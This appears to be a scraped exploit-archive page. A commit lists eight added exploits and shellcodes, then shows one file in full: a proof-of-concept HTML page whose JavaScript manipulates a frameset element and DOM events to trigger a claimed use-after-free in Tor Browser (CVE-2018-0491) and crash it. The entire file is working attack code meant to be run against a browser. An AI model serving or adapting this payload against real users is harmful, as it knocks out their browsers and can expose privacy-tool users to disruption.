727943f775
8 changes to exploits/shellcodes Tor Browser < 0.3.2.10 - Use After Free (PoC) Boxoft WAV to WMA Converter 1.0 - Local Buffer Overflow (SEH) Activision Infinity Ward Call of Duty Modern Warfare 2 - Buffer Overflow HP VAN SDN Controller - Root Command Injection (Metasploit) HID discoveryd - command_blink_on Unauthenticated RCE (Metasploit) GitList 0.6.0 - Argument Injection (Metasploit) Umbraco CMS SeoChecker Plugin 1.9.2 - Cross-Site Scripting Linux/x86 - Kill Process Shellcode (20 bytes)
30 lines
No EOL
988 B
HTML
30 lines
No EOL
988 B
HTML
# Exploit Title: Tor Browser - Use After Free (PoC)
|
|
# Date: 09.07.2018
|
|
# Exploit Author: t4rkd3vilz
|
|
# Vendor Homepage: https://www.torproject.org/
|
|
# Software Link: https://www.torproject.org/download/download-easy.html.en
|
|
# Version: Tor 0.3.2.x before 0.3.2.10
|
|
# Tested on: Kali Linux
|
|
# CVE : CVE-2018-0491
|
|
|
|
#Run exploit, result DOS
|
|
|
|
|
|
<!DOCTYPE html>
|
|
<html>
|
|
<title>veryhandsome jameel naboo</title>
|
|
<body>
|
|
<script>
|
|
function send()
|
|
{
|
|
try { document.body.contentEditable = 'true'; } catch(e){}
|
|
try { var e0 = document.createElement("frameset"); } catch(e){}
|
|
try { document.body.appendChild(e0); } catch(e){}
|
|
try { e0.appendChild(document.createElement("BBBBBBBBBBBBBBB")); } catch(e){}
|
|
try {
|
|
e0.addEventListener("DOMAttrModified",function(){document.execCommand("SelectAll");e0['bo
|
|
rder']='-4400000000';}, false); e0.focus();} catch(e){}
|
|
try { e0.setAttribute('iframe'); } catch(e){}
|
|
try { document.body.insertBefore(e0); } catch(e){}
|
|
}
|
|
send();</script></html> |